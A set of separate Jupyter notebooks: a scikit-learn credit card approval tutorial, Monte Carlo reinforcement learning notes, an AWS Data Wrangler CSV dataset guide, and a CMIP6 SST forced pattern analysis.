technique called <a href="http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.LabelEncoder.html">label encoding</a>.</p> ``` # Import LabelEncoder # ... YOUR CODE FOR TASK 6 ... from sklearn.preprocessing import LabelEncoder # Instantiate LabelEncoder # ... YOUR CODE FOR TASK 6 ... le = LabelEncoder() # Iterate over all the values of each column and extract their dtypes for col in cc_apps.columns: # Compare if the dtype is object if cc_apps[col].dtype == 'object': # Use LabelEncoder to do the numeric transformation cc_apps[col]=le.fit_transform(cc_apps[col]) ``` ## 7. Splitting the dataset into train and test sets <p>We have successfully converted all the non-numeric values to numeric ones.</p> <p>Now, we will split our data into train set and test set to prepare our data for two different phases of machine learning modeling: training and testing. Ideally, no information from the test data should be used to scale the training data or should be used to direct the training process of a machine learning model. Hence, we first split the data and then apply the scaling.</p> <p>Also, features like <code>DriversLicense</code> and <code>ZipCode</code> are not as important as the other features in the dataset for predicting credit card approvals. We should drop them to design our machine learning model with the best set of features. In Data Science literature, this is often referred to as <em>feature selection</em>. </p> ``` # Import train_test_split # ... YOUR CODE FOR TASK 7 ... from sklearn.model_selection import train_test_split # Drop the features 11 and 13 and convert the DataFrame to a NumPy array cc_apps = cc_apps.drop([11, 13], axis=1) cc_apps = cc_apps.values # Segregate features and labels into separate variables X,y = cc_apps[:,0:13] , cc_apps[:,13] # Split into train and test sets X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.33, random_state = 42) ``` ## 8. Preprocessing the data (part ii) <p>The data is now split into two separate sets - train and test sets respectively. We are only left with one final preprocessing step of scaling before we can fit a machine learning model to the data. </p> <p>Now, let's try to understand what these scaled values mean in the real world. Let's use <code>CreditScore</code> as an example. The credit score of a person is their creditworthiness based on their credit history. The higher this number, the more financially trustworthy a person is considered to be. So, a <code>CreditScore</code> of 1 is the highest since we're rescaling all the values to the range of 0-1.</p> ``` # Import MinMaxScaler # ... YOUR CODE FOR TASK 8 ... from sklearn.preprocessing import MinMaxScaler # Instantiate MinMaxScaler and use it to rescale X_train and X_test scaler = MinMaxScaler(feature_range=(0, 1)) rescaledX_train = scaler.fit_transform(X_train) rescaledX_test = scaler.fit_transform(X_test) ``` ## 9. Fitting a logistic regression model to the train set <p>Essentially, predicting if a credit card application will be approved or not is a <a href="https://en.wikipedia.org/wiki/Statistical_classification">classification</a> task. <a href="http://archive.ics.uci.edu/ml/machine-learning-databases/credit-screening/crx.names">According to UCI</a>, our dataset contains more instances that correspond to "Denied" status than instances corresponding to "Approved" status. Specifically, out of 690 instances, there are 383 (55.5%) applications that got denied and 307 (44.5%) applications that got approved. </p> <p>This gives us a benchmark. A good machine learning model should be able to accurately predict the status of the applications with respect to these statistics.</p> <p>Which model should we pick? A question to ask is: <em>are the features that affect the credit card approval decision process correlated with each other?</em> Although we can measure correlation, that is outside the scope of this notebook, so we'll rely on our intuition that they indeed are correlated for now. Because of this correlation, we'll take advantage of the fact that generalized linear models perform well in these cases. Let's start our machine learning modeling with a Logistic Regression model (a generalized linear model).</p> ``` # Import LogisticRegression # ... YOUR CODE FOR TASK 9 ... from sklearn.linear_model import LogisticRegression # Instantiate a LogisticRegression classifier with default parameter values logreg = LogisticRegression() # Fit logreg to the train set # ... YOUR CODE FOR TASK 9 ... logreg.fit(rescaledX_train, y_train) ``` ## 10. Making predictions and evaluating performance <p>But how well does our model perform? </p> <p>We will now evaluate our model on the test set with respect to <a href="https://developers.google.com/machine-learning/crash-course/classification/accuracy">classification accuracy</a>. But we will also take a look the model's <a href="http://www.dataschool.io/simple-guide-to-confusion-matrix-terminology/">confusion matrix</a>. In the case of predicting credit card applications, it is equally important to see if our machine learning model is able to predict the approval status of the applications as denied that originally got denied. If our model is not performing well in this aspect, then it might end up approving the application that should have been approved. The confusion matrix helps us to view our model's performance from these aspects. </p> ``` # Import confusion_matrix # ... YOUR CODE FOR TASK 10 ... from sklearn.metrics import confusion_matrix # Use logreg to predict instances from the test set and store it y_pred = logreg.predict(rescaledX_test) # Get the accuracy score of logreg model and print it print("Accuracy of logistic regression classifier: ", logreg.score(rescaledX_test, y_test)) # Print the confusion matrix of the logreg model # ... YOUR CODE FOR TASK 10 ... print(confusion_matrix(y_test, y_pred)) ``` ## 11. Grid searching and making the model perform better <p>Our model was pretty good! It was able to yield an accuracy score of almost 84%.</p> <p>For the confusion matrix, the first element of the of the first row of the confusion matrix denotes the true negatives meaning the number of negative instances (denied applications) predicted by the model correctly. And the last element of the second row of the confusion matrix denotes the true positives meaning the number of positive instances (approved applications) predicted by the model correctly.</p> <p>Let's see if we can do better. We can perform a <a href="https://machinelearningmastery.com/how-to-tune-algorithm-parameters-with-scikit-learn/">grid search</a> of the model parameters to improve the model's ability to predict credit card approvals.</p> <p><a href="http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html">scikit-learn's implementation of logistic regression</a> consists of different hyperparameters but we will grid search over the following two:</p> <ul> <li>tol</li> <li>max_iter</li> </ul> ``` # Import GridSearchCV # ... YOUR CODE FOR TASK 11 ... from sklearn.model_selection import GridSearchCV # Define the grid of values for tol and max_iter tol = [0.01, 0.001, 0.0001] max_iter = [100, 150, 200] # Create a dictionary where tol and max_iter are keys and the lists of their values are corresponding values param_grid = {'tol':tol, 'max_iter':max_iter} ``` ## 12. Finding the best performing model <p>We have defined the grid of hyperparameter values and converted them into a single dictionary format which <code>GridSearchCV()</code> expects as one of its parameters. Now, we will begin the grid search to see which values perform best.</p> <p>We will instantiate <code>GridSearchCV()</code> with our earlier <code>logreg</code> model with all the data we have. Instead of passing train and test sets separately, we will supply <code>X</code> (scaled version) and <code>y</code>. We will also instruct <code>GridSearchCV()</code> to perform a <a href="https://www.dataschool.io/machine-learning-with-scikit-learn/">cross-validation</a> of five folds.</p> <p>We'll end the notebook by storing the best-achieved score and the respective best parameters.</p> <p>While building this credit card predictor, we tackled some of the most widely-known preprocessing steps such as <strong>scaling</strong>, <strong>label encoding</strong>, and <strong>missing value imputation</strong>. We finished with some <strong>machine learning</strong> to predict if a person's application for a credit card would get approved or not given some information about that person.</p> ``` # Instantiate GridSearchCV with the required parameters grid_model = GridSearchCV(estimator = logreg, param_grid = param_grid, cv = 5) # Use scaler to rescale X and assign it to rescaledX rescaledX = scaler.fit_transform(X) # Fit data to grid_model grid_model_result = grid_model.fit(rescaledX, y) # Summarize results best_score, best_params = grid_model_result.best_score_, grid_model_result.best_params_ print("Best: %f using %s" % (best_score, best_params)) ```
github_jupyter
# Chapter 5: Monte Carlo Methods ## 1. Introduction - Do not assume complete knownledge of the environment - Learning from experience of interaction with environment - Experience is divided into **episodes** - Based on averaging sample returns - complete returns of each episode - Like an associative bandit - Nonstationary from the point of view of the earlier state - Adapt the idea of GPI from DP ## 2. Monte Carlo Prediction - Learning the state-value function $v_\pi(s)$ for a given policy $\pi$ - Estimate from experience by averaging the returns observed after visits to that state $s$ - a **visit** to $s$: each occurrence of state $s$ in an episode - 2 methods: - **first-visit** MC: average of the returns only for the first visits to $s$ - **every-visit** MC: average of the returns for all visits to $s$ - Only on choice considered at each state (unlike DP) - only sampled on the one episode - Estimates for each state are independent - computational expense of estimating a single state is independent of the number of states - Do not bootstrap (unlike DP) - first-visit MC algorithm ![First-Visit MC](assets/5.1.first-visit-mc.png) ## 3. Monte Carlo Estimation of Action Values - if a model is not available, MC is useful to estimate action values $q_*$ - Averaging returns starting from state $s$, taking action $a$ following policy $\pi$ - a **visit** to pair $s,a$: each occurrence of state $s$ and action $a$ is taken in it, in an episode - 2 methods: - first-visit MC: average of the returns only for the first visits to $s, a$ - every-visit MC: average of the returns for all visits to $s, a$ - Need to estimate the value of all the actions from each state - **Exploring starts**: every pairs $s,a$ has nonzero probability of being selected as the start ## 4. Monte Carlo Control - Use GPI $$\pi_0 \stackrel{E}{\longrightarrow} q_{\pi_0} \stackrel{I}{\longrightarrow} \pi_1 \stackrel{E}{\longrightarrow} q_{\pi_1} \stackrel{I}{\longrightarrow} \pi_2 \stackrel{E}{\longrightarrow} ... \stackrel{I}{\longrightarrow} \pi_* \stackrel{E}{\longrightarrow} q_{\pi_*}$$ - Policy evaluation $\stackrel{E}{\longrightarrow}$: using MC methods for prediction - Policy improment $\stackrel{I}{\longrightarrow}$: policy greedy with respect to the current value function - meets the conditions for policy improvement by policy improvement theorem - if, $\pi_{k+1}=\pi_k$, then $\pi_k=\pi_*$ $$ \begin{aligned} q_{\pi_k}\big(s,\pi_{k+1}(s)\big) &= q_{\pi_k}\big(s,\arg\max_a q_{\pi_k}(s,a)\big) \\ &= \max_a q_{\pi_k}(s,a) \\ &\ge q_{\pi_k}\big(s,\pi_k(s)\big) \\ &\ge v_{\pi_k}(s) \end{aligned} $$ - Converage conditions assumptions: - (1) episodes have exploring starts - (2) policy evaluation could be done with an infinite number of episodes - Need to remove both assumptions in order to obtain a practical algorithm - Solve the assumption (2): - Obtain bounds on the magnitude and probability of error in the estimates, assure that these bounds are sufficiently small - Value Iteration - Alterate between improvement and evaluation steps for single states - Monte Carlo Exploring Starts (*Monte Carlo ES*) - alterate between evaluation and improvement on an episode-by-episode basis - convergence to this fixed point (fixed point is optimal policy $\pi_*$) seems inevitable ![Monte Carlo Exploring Starts](assets/5.3.mc-es.png) - Monte Carlo without Exploring Starts - **on-policy** methods: evaluate or improve the policy that is used to make decisions - **off-policy** methods: evaluate or improve the policy different from that is used to generate the data ## 5. On-Policy method - Learn about policy currently executing - Policy is generally soft $\pi(a | s) > 0$ - ε-soft policy like ε-greedy: - probability of nongreedy is $\dfrac{\epsilon}{| \mathcal A(s) |}$ - and, probability of greedy is $1-\epsilon+\dfrac{\epsilon}{| \mathcal A(s) |}$ - ε-greedy with respect to $q_\pi$ is an improvement over any ε-soft policy $\pi$ is assured by the policy improvement theorem $$ \begin{aligned} q_\pi\big(s,\pi'(s)\big) &= \sum_a \pi'(a | s) q_\pi(s,a) \\ &= \frac{\epsilon}{| \mathcal A(s) |}\sum_a q_\pi(s,a) + (1-\epsilon)\max_a q_\pi(s,a) \\ &\ge \frac{\epsilon}{| \mathcal A(s) |}\sum_a q_\pi(s,a) + (1-\epsilon)\sum_a \frac{\pi(a | s)-\frac{\epsilon}{| \mathcal A(s) |}}{1-\epsilon} q_\pi(s,a) \\ &= \frac{\epsilon}{| \mathcal A(s) |}\sum_a q_\pi(s,a) - \frac{\epsilon}{| \mathcal A(s) |}\sum_a q_\pi(s,a) + \sum_a \pi(a | s) q_\pi(s,a) \\ &\ge v_\pi(s) \end{aligned} $$ - Converages to best ε-soft policy $v_\pi=\tilde v_* ~~~, \forall s\in\mathcal S$ ![On-Policy e-soft](assets/5.4.e-soft.png) ## 6. Off-policy method - learn the value of the **target policy** $\pi$ from experience due to **behavior policy** $b$ - optimal policy: target policy - exploratory & generate policy: behavior policy - more powerfull and general than on-policy - greater variance and slower to converge - on-policy methods is special case in which $\pi = b$ - Coverage assumption: $b$ generates behavior that covers, or includes, $\pi$ $$\pi(a | s) > 0 \implies b(a | s) > 0$$ - Method: use **importance sampling** - estimate expected values under one distribution given samples from another - **importance-sampling ratio**: weighting returns according to the relative probability of their trajectories under the two policies - The relative probability of the trajectory under 2 polices depend only on the 2 policies and the sequence: $$\rho_{t:T-1} = \prod_{k=1}^{T-1}\frac{\pi(A_k | S_k)}{b(A_k | S_k)}$$ - Expected value of target policy: $$v_\pi(s) = E\big[\rho_{t:T-1}G_t | S_t=s\big]$$ where, $G_t$ is returns of $b$ : $v_b(s) = E\big[G_t | S_t=s\big]$ - indexing time steps in a way that increases across episode boundaries - first episode ends in terminal state at time $t-1=100$ - next episode begins at time $t=101$ - 2 types of importance sampling: - **ordinary importance sampling**: $$V(s) = \frac{\sum_{t\in\mathscr T(s)}\rho_{t:T(t)-1}G_t}{| \mathscr T |}$$ - **weighted importance sampling**: $$V(s) = \frac{\sum_{t\in\mathscr T(s)}\rho_{t:T(t)-1}G_t}{\sum_{t\in\mathscr T(s)}\rho_{t:T(t)-1}}$$ where: - $\mathscr T(s)$: set of all time steps in which state $s$ is visited - $T(t)$: first time of termination following time $t$ - $G_t$: returns after $t$ up through $T(t)$ - $\{G_t\}_{t\in\mathscr T(s)}$ are the returns that pertain to state $s$ - $\{\rho_{t:T(t)-1}\}_{t\in\mathscr T(s)}$ are the corresponding importance-sampling ratios - for the *first-visit* methods: - ordinary importance sampling is unbiased and variance is unbounded - weighted importance sampling is biased and variance is bound $[0, 1)$ (converges to zero) - for the *every-visit* methods: - both biased - bias falls asymptotically to zero as the number of samples increases ## 7. Incremental Implementation for MC prediction - similar to Bandits ([Chap 2](chap2.ipynb#5.-Incremental-Implementation)) but for the average *returns* $G_t$ instead of average *rewards* $R_t$ - for *on-policy*: exactly the same methods as Bandits - for *ordinary importance sampling* - scaling returns by $\rho_{t:T(t)-1}$ - for *weighted importance sampling* - have sequence of returns $G_1, G_2, ..., G_{n-1}$ all starting in the same state - corresponding random weight $W_i$ (e.g., $W_i = \rho_{t_i:T(t_i)-1}$) $$V_n = \frac{\sum_{k=1}^{n-1}W_kG_k}{\sum_{k=1}^{n-1}W_k} ~~~, n\ge 2$$ - update rule: $$ \begin{cases} V_{n+1} &= V_n + \dfrac{W_n}{C_n}\big[G_n - V_n\big] ~~~, n\ge 1 \\ C_{n+1} &= C_n + W_{n+1} ~~~, C_0 = 0 \end{cases} $$ - can apply to on-policy when $\pi=b, W=1$ ![Weighted Importance Sampling](assets/5.6.weighted-importance-sampling.png) ## 8. Off-policy MC Control - Requires behavior $b$ is soft: $b(a | s) > 0$ - Advantage: - target policy $\pi$ may be deterministic (e.g., greedy) - while the behavior policy $b$ can continue to sample all possible actions - Disadvantages: - learn only from the tails of episodes (the remaining actions in the episode are greedy) - Greatly slow learning when non-greedy actions are common (states appearing in the early portions of long episodes) ![off-policy MC control](assets/5.7.off-policy-mc-control.png) ## 9. Discounting-aware Importance Sampling - Use discounted rewards structure of the returns to reduce the variance of off-policy estimators - **flat partial returns**: $$\overline G_{t:h} = R_{t+1} + R_{t+2} + ... + R_h ~~~, 0\le t < h\le T$$ - full return $G_t$ by flat partial returns: $$ \begin{aligned} G_t &= R_{t+1} + \gamma R_{t+2} + \gamma^2 R_{t+3} + ... + \gamma^{T-t-1} R_T \\ &= (1-\gamma)R_{t+1} \\ & ~~~ + (1-\gamma)\gamma(R_{t+1} + R_{t+2}) \\ & ~~~ + (1-\gamma)\gamma^2(R_{t+1} + R_{t+2} + R_{t+3}) \\ & ~~~\vdots \\ & ~~~ + (1-\gamma)\gamma^{T-t-2}(R_{t+1} + R_{t+2} + ... + R_{T-1}) \\ & ~~~ + \gamma^{T-t-1}(R_{t+1} + R_{t+2} + ... + R_T) \\ &= (1-\gamma)\sum_{h=t+1}^{T-1}\gamma^{h-t-1}\overline G_{t:h} + \gamma^{T-t-1}\overline G_{t:T} \end{aligned} $$ - **discounting-aware** importance sampling - discount rate but have no effect if $\gamma=1$ - for ordinary importance-sampling estimator: $$V(s)=\dfrac{\displaystyle\sum_{t\in\mathscr T(s)}\Big( (1-\gamma)\sum_{h=t+1}^{T(t)-1}\gamma^{h-t-1}\rho_{t:h-1}\overline G_{t:h} + \gamma^{T(t)-t-1}\rho_{t:T(t)-1}\overline G_{t:T(t)}\Big)}{| \mathscr T(s) |}$$ - for weighted importance-sampling estimator: $$V(s)=\dfrac{\displaystyle\sum_{t\in\mathscr T(s)}\Big( (1-\gamma)\sum_{h=t+1}^{T(t)-1}\gamma^{h-t-1}\rho_{t:h-1}\overline G_{t:h} + \gamma^{T(t)-t-1}\rho_{t:T(t)-1}\overline G_{t:T(t)}\Big)}{\displaystyle\sum_{t\in\mathscr T(s)}\Big( (1-\gamma)\sum_{h=t+1}^{T(t)-1}\gamma^{h-t-1}\rho_{t:h-1} + \gamma^{T(t)-t-1}\rho_{t:T(t)-1}\Big)}$$ ## 10. Per-decision Importance Sampling - One more way of reducing variance, even if $\gamma=1$ - Use structure of the returns as sum of rewards $$ \begin{aligned} \rho_{t:T-1}G_t &= \rho_{t:T-1}(R_{t+1}+\gamma R_{t+2}+...+\gamma^{T-t-1} R_T) \\ &= \rho_{t:T-1}R_{t+1}+\gamma\rho_{t:T-1}R_{t+2}+...+\gamma^{T-t-1}\rho_{t:T-1}R_T \end{aligned} $$ where, sub-term $\rho_{t:T-1}R_{t+k}$ depend only on the first and the last rewards $$E[\rho_{t:T-1}R_{t+k}] = E[\rho_{t:t+k-1}R_{t+k}]$$ - **per-decision** importance-sampling $$E[\rho_{t:T-1}G_t] = E[\tilde G_t]$$ where, $\tilde G_t=\rho_{t:t}R_{t+1} + \gamma\rho_{t:t+1}R_{t+2} + \gamma^2\rho_{t:t+2}R_{t+3} + ... + \gamma^{T-t-1}\rho_{t:T-1}R_T$ - Use for *ordinary* importance-sampling - same unbiased expectation (in the first-visit case) as the ordinary importance-sampling estimator - but not consistent (do not converge to the true value with infinite data) $$V(s)=\frac{\sum_{t\in\mathscr T(s)}\tilde G_t}{| \mathscr T(s) |}$$ - NOT for weighted importance-sampling
github_jupyter
[![AWS Data Wrangler](_static/logo.png "AWS Data Wrangler")](https://github.com/awslabs/aws-data-wrangler) # 11 - CSV Datasets Wrangler has 3 different write modes to store CSV Datasets on Amazon S3. - **append** (Default) Only adds new files without any delete. - **overwrite** Deletes everything in the target directory and then add new files. - **overwrite_partitions** (Partition Upsert) Only deletes the paths of partitions that should be updated and then writes the new partitions files. It's like a "partition Upsert". ``` from datetime import date import awswrangler as wr import pandas as pd ``` ## Enter your bucket name: ``` import getpass bucket = getpass.getpass() path = f"s3://{bucket}/dataset/" ``` ## Checking/Creating Glue Catalog Databases ``` if "awswrangler_test" not in wr.catalog.databases().values: wr.catalog.create_database("awswrangler_test") ``` ## Creating the Dataset ``` df = pd.DataFrame({ "id": [1, 2], "value": ["foo", "boo"], "date": [date(2020, 1, 1), date(2020, 1, 2)] }) wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="overwrite", database="awswrangler_test", table="csv_dataset" ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## Appending ``` df = pd.DataFrame({ "id": [3], "value": ["bar"], "date": [date(2020, 1, 3)] }) wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="append", database="awswrangler_test", table="csv_dataset" ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## Overwriting ``` wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="overwrite", database="awswrangler_test", table="csv_dataset" ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## Creating a **Partitoned** Dataset ``` df = pd.DataFrame({ "id": [1, 2], "value": ["foo", "boo"], "date": [date(2020, 1, 1), date(2020, 1, 2)] }) wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="overwrite", database="awswrangler_test", table="csv_dataset", partition_cols=["date"] ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## Upserting partitions (overwrite_partitions) ``` df = pd.DataFrame({ "id": [2, 3], "value": ["xoo", "bar"], "date": [date(2020, 1, 2), date(2020, 1, 3)] }) wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="overwrite_partitions", database="awswrangler_test", table="csv_dataset", partition_cols=["date"] ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## BONUS - Glue/Athena integration ``` df = pd.DataFrame({ "id": [1, 2], "value": ["foo", "boo"], "date": [date(2020, 1, 1), date(2020, 1, 2)] }) wr.s3.to_csv( df=df, path=path, dataset=True, index=False, mode="overwrite", database="aws_data_wrangler", table="my_table", compression="gzip" ) wr.athena.read_sql_query("SELECT * FROM my_table", database="aws_data_wrangler") ```
github_jupyter
# Forced pattern analysis of SST Reading in SST data and performing low-frequency component analysis ``` %matplotlib inline import xarray as xr import numpy as np import matplotlib.pyplot as plt import intake #import cftime # util.py is in the local directory # it contains code that is common across project notebooks # or routines that are too extensive and might otherwise clutter # the notebook design import util ``` ## Using `intake-esm` to get SST data [Intake-esm](https://intake-esm.readthedocs.io) is a data cataloging utility that facilitates access to CMIP data. It's pretty awesome. An `intake-esm` collection object establishes a link to a database that contains file locations and associated metadata (i.e. which experiement, model, etc. thet come from). ### Opening a collection First step is to open a collection by pointing to the collection definition file, which is a JSON file that conforms to the [ESM Collection Specification](https://github.com/NCAR/esm-collection-spec). The collection JSON files are stored locally in this repository for purposes of reproducibility---and because Cheyenne compute nodes don't have Internet access. The primary source for these files is the [intake-esm-datastore](https://github.com/NCAR/intake-esm-datastore) repository. Any changes made to these files should be pulled from that repo. For instance, the Pangeo cloud collection is available [here](https://raw.githubusercontent.com/NCAR/intake-esm-datastore/master/catalogs/pangeo-cmip6.json). ``` if util.is_ncar_host(): col = intake.open_esm_datastore("../catalogs/glade-cmip6.json") else: col = intake.open_esm_datastore("../catalogs/pangeo-cmip6.json") #col ``` `intake-esm` is build on top of [pandas](https://pandas.pydata.org/pandas-docs/stable). It is possible to view the `pandas.DataFrame` as follows. ``` #col.df.head() ``` It is possible to interact with the `DataFrame`; for instance, we can see what the "attributes" of the datasets are by printing the columns. ``` #col.df.columns ``` ### Search and discovery #### Finding unique entries Let's query the data to see what models ("source_id"), experiments ("experiment_id") and temporal frequencies ("table_id") are available. ``` import pprint uni_dict = col.unique(['source_id', 'experiment_id', 'table_id']) #pprint.pprint(uni_dict, compact=True) ``` #### Searching for specific datasets Let's find all the dissolved oxygen data at annual frequency from the ocean for the `historical` and `ssp585` experiments. ``` cat = col.search(experiment_id=['historical', 'ssp585'], table_id='Amon', variable_id='ts', grid_label='gn') #cat.df ``` It might be desirable to get more specific. For instance, we may want to select only the models that have *both* `historical` and `ssp585` data. We coud do this as follows. ``` models = set(uni_dict['source_id']['values']) # all the models for experiment_id in ['historical', 'ssp585']: query = dict(experiment_id=experiment_id, table_id='Amon', variable_id='ts', grid_label='gn') cat = col.search(**query) models = models.intersection({model for model in cat.df.source_id.unique().tolist()}) models = list(models) models cat = col.search(experiment_id=['historical', 'ssp585'], table_id='Amon', variable_id='ts', grid_label='gn', source_id=models) #cat.df ``` ### Loading data `intake-esm` enables loading data directly into an [xarray.Dataset](http://xarray.pydata.org/en/stable/api.html#dataset). Note that data on the cloud are in [zarr](https://zarr.readthedocs.io/en/stable/) format and data on [glade](https://www2.cisl.ucar.edu/resources/storage-and-file-systems/glade-file-spaces) are stored as [netCDF](https://www.unidata.ucar.edu/software/netcdf/) files. This is opaque to the user. `intake-esm` has rules for aggegating datasets; these rules are defined in the collection-specification file. ``` dset_dict = cat.to_dataset_dict(zarr_kwargs={'consolidated': True, 'decode_times': True}, cdf_kwargs={'chunks': {}, 'decode_times': True}) ``` `dset_dict` is a dictionary of `xarray.Dataset`'s; its keys are constructed to refer to compatible groups. ``` dset_dict.keys() ``` We can access a particular dataset as follows. ``` # choose model here ds_hist = dset_dict['CMIP.MIROC.MIROC6.historical.Amon.gn'] ds_ssp585 = dset_dict['ScenarioMIP.MIROC.MIROC6.ssp585.Amon.gn'] ds_hist.ts ds_hist = ds_hist.chunk({'member_id': 1, 'time': 1980}) ds_ssp585 = ds_ssp585.chunk({'member_id': 1, 'time': 1980}) ``` ### Get land fraction As motivation for diving into more advanced manipulations with `intake-esm`, let's consider the task of getting access to grid information in the `Ofx` table_id. ``` cat_fx = col.search(experiment_id=['historical'], source_id=models, variable_id='sftlf', table_id='fx', grid_label='gn') #cat_fx.df df = cat_fx.df.copy() df.drop_duplicates(subset=['source_id', 'variable_id'], inplace=True) #df ``` Now, since we've only retained one ensemble member, we need to eliminate that column. If we omit this step, `intake-esm` will throw an error, complaining that different variables are present for each ensemble member. Setting the `member_id` column to NaN precludes attempts to join along the ensemble dimension. After this final manipulation, we copy the `DataFrame` back to the collection object and proceed with loading the data. ``` df['member_id'] = np.nan cat_fx.df = df fx_dsets = cat_fx.to_dataset_dict(zarr_kwargs={'consolidated': True}, cdf_kwargs={'chunks': {}}) fx_dsets.keys() for key, ds in fx_dsets.items(): print(ds.data_vars) lat=ds_hist['lat'] lon=ds_hist['lon'] members = ds_hist['member_id'] ne = np.shape(members) ne members[0].values ds_ssp585.time hist_amean=ds_hist.groupby('time.year').mean('time') ssp585_amean=ds_ssp585.groupby('time.year').mean('time') hist_amean = hist_amean - hist_amean.mean('year') ssp585_amean = ssp585_amean - ssp585_amean.mean('year') hist_amean_emean = hist_amean.mean('member_id') ssp585_amean_emean = ssp585_amean.mean('member_id') hist_clim=ds_hist.groupby('time.month').mean('time') ssp585_clim=ds_ssp585.groupby('time.month').mean('time') hist_clim_emean = hist_clim.mean('member_id') ssp585_clim_emean = ssp585_clim.mean('member_id') hist_anom = ds_hist.groupby('time.month') - hist_clim ssp585_anom = ds_ssp585.groupby('time.month') - ssp585_clim hist_anom_emean = hist_anom.mean('member_id') ssp585_anom_emean = ssp585_anom.mean('member_id') field = ssp585_anom_emean.ts.values f=plt.figure() plt.contourf(lon,lat,np.mean(field[912:1031,:,:],0)-np.mean(field[0:119,:,:],0),np.arange(-10,10.1,.1),cmap=plt.cm.RdBu_r) cbar = plt.colorbar(extend='both') # Preprocessing for Large Ensemble EOFs (with upscaling) cosw = np.sqrt(np.cos(lat*np.pi/180)) X=hist_amean*cosw X_concat=X.stack(index=['year','member_id']) X_ensmean=X.mean('member_id') T = X_ensmean.year X_upscale = X_concat.coarsen(lon=2, lat = 2, boundary='trim').mean() X_ensmean_upscale = X_ensmean.coarsen(lon = 2, lat = 2, boundary='trim').mean() X_upscale_flat = X_upscale.stack(shape=['lat','lon']) X_ensmean_upscale_flat = X_ensmean_upscale.stack(shape=['lat','lon']) latu = X_upscale.lat.values lonu = X_upscale.lon.values %%time # Large Ensemble EOFs (with upscaling) u,s,v=np.linalg.svd(X_upscale_flat.ts.values/np.sqrt(len(T)-1)) eigvals=np.diag(s*s) cosw = np.sqrt(np.cos(latu*np.pi/180)) # Dimension checks #print(ds_upscale.shape) #plt.contourf(ds_upscale.lon,ds_upscale.lat,ds_upscale[0,0,:,:]) #ds_upscale.lat_bins Xe = X_ensmean_upscale_flat.ts.values Xs = X_upscale_flat.ts.values np.shape(Xe) np.shape(S) # Large Ensemble Forced Patterns neof=200 # changed from u S=np.matmul(v[:,0:neof],np.diag(1/s[0:neof])) Sadj=np.matmul(np.diag(s[0:neof]),v[:,0:neof].T) #EFPCs=np.matmul(ds_ensmean.values,S) EFPCs=np.matmul(Xe,S) gamma=np.cov(EFPCs.T) #covariance matrix u2,s2,v2=np.linalg.svd(gamma) EFP=np.matmul(v2,Sadj) #EFP_reshaped=EFP.reshape(neof,len(lat),len(lon))/cosw.values[None,:,None] EFP_reshaped=EFP.reshape(neof,len(latu),len(lonu))/cosw[None,:,None] #weights = np.matmul(S,v2.T).reshape(len(lat),len(lon),neof)*cosw.values[:,None,None] weights = np.matmul(S,v2.T) weights = weights.reshape(len(latu),len(lonu),neof)*cosw[:,None,None] #weights=weights.reshape(len(lat)*len(lon),neof) weights=weights.reshape(len(latu)*len(lonu),neof) #EFCs= np.matmul(ds_flat.values.T,weights) #EFC_emean = np.matmul(ds_ensmean.values,weights) EFCs= np.matmul(Xs,weights) EFC_emean = np.matmul(Xe,weights) for ii in range(neof): if np.mean(EFP[ii,:]) < 0: EFP_reshaped[ii,:,:] = -EFP_reshaped[ii,:,:] EFP[ii,:] = -EFP[ii,:] EFCs[:,ii] = -EFCs[:,ii] EFC_emean[:,ii] = -EFC_emean[:,ii] print(s2[0:20]) plt.plot(s2,marker='o') plt.xlim(0,20) plt.title('Signal-to-Noise Ratio') s2_check = np.zeros(20) for ii in range(20): s2_check[ii] = np.mean(np.square(EFC_emean[:,ii]))/np.mean(np.square(EFCs[:,ii])) print(s2_check) f=plt.figure() plt.plot(s2_check,marker='o') plt.title('Signal-to-Noise Ratio') EFP_reshaped[0,:,:] = EFP_reshaped[0,:,:]*np.std(EFCs[:,0]) EFP_reshaped[1,:,:] = EFP_reshaped[1,:,:]*np.std(EFCs[:,1]) EFP_reshaped[2,:,:] = EFP_reshaped[2,:,:]*np.std(EFCs[:,2]) EFC_emean[:,0] = EFC_emean[:,0]/np.std(EFCs[:,0]) EFC_emean[:,1] = EFC_emean[:,1]/np.std(EFCs[:,1]) EFC_emean[:,2] = EFC_emean[:,2]/np.std(EFCs[:,2]) EFCs[:,0] = EFCs[:,0]/np.std(EFCs[:,0]) EFCs[:,1] = EFCs[:,1]/np.std(EFCs[:,1]) EFCs[:,2] = EFCs[:,2]/np.std(EFCs[:,2]) f=plt.figure() plt.pcolormesh(lonu,latu,np.squeeze(EFP_reshaped[0,:,:]),cmap=plt.cm.get_cmap('RdBu_r',20)) plt.clim(-0.8,0.8) plt.colorbar(extend='both') f=plt.figure() plt.pcolormesh(lonu,latu,np.squeeze(EFP_reshaped[1,:,:]),cmap=plt.cm.get_cmap('RdBu_r',20)) plt.clim(-0.8,0.8) plt.colorbar(extend='both') f=plt.figure() plt.pcolormesh(lonu,latu,np.squeeze(EFP_reshaped[2,:,:]),cmap=plt.cm.get_cmap('RdBu_r',20)) plt.clim(-0.8,0.8) plt.colorbar(extend='both') EFCs_reshape=EFCs.reshape(165,10,neof) #plt.plot(np.std(EFCs,axis=0),marker='o') #plt.xlim(0,20) #plt.title('Standard Deviation of EFC') for neof_plot in range(3): f=plt.figure() [plt.plot(T.values,EFCs_reshape[:,mm,neof_plot],color='crimson') for mm in range(10)]; plt.plot(T.values,EFC_emean[:,neof_plot]) plt.title('EFC'+str(neof_plot+1)) T = X_ensmean.year T ```
github_jupyter
